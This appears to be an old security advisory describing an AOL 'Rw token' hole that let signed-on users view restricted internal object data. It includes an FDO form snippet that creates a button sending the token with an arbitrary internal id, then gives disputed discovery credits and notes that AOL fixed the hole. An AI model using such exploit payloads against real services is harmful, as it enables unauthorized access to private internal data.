|
Vulnerability AOL (America Online Token Hole) Affected AOL Description Kevin Mack found out that by sending the "Rw" token to the AOL host while signed on along with the object's internal id as arg, any user could get detailed info about any object on the system. Included in this information is the user who created the object and tons of other information like its current viewrule and AOL url. Normally only internal users are allowed such access for security reasons. Using this exploit, anyone can see headings in AOL's Network Operations Center and look at user count information and AOL mothly profits before they are even released. AOL put all there stuff online... Anyways the hole still exists but is windowed for only about an hour a day. No clue why and it seems random (despite the fact that was fixed)... For example on July 7th it existed between 6:30-7:30PM EST. Here is a sample FDO88/91 that will create a button to the send the Rw token with arg and help you exploit... fill the internal id with any number you wish to see.. man_start_object < trigger, "" > mat_relative_tag < 22 > act_replace_select_action < uni_start_stream sm_send_token_arg <"Rw", INTERNAL ID HERE> uni_end_stream > mat_precise_x < 0 > mat_precise_y < 226 > mat_font_sis < small_fonts, 7, normal> mat_art_id < 1-0-21184 > mat_bool_default < yes > man_end_object Programmable AOL buttons are written in FDO(Form Display Operation). You can compile these forms using AOL's Visual Publisher Designer tool. The Rw token exploit was discovered in early 1998 by Slushie and Uaert, not by this Mackk person. The Rw token was used when AOL accounts with Rainman publishing rights had access to two or more Rainman Groups. Since objects could have the same external ID and be in different Rainman Groups, AOL designed the Rw token to allow you to choose the particular Rainman Group you wanted the EOI feedback displayed from. After AOL patched the Rw in early 1998, Rainman users were no longer able to get a list of all the objects using the same external ID. Instead they had to type in the Rainman group AND the external ID in order to view the EOI feedback i.e "1928.tos blah" Solution AOL officially fixed the hole, but I'm not sure what's with that 1h our exploit period. Of course, this is AOL we are talking about and they are not known for running the most efficient and secure service.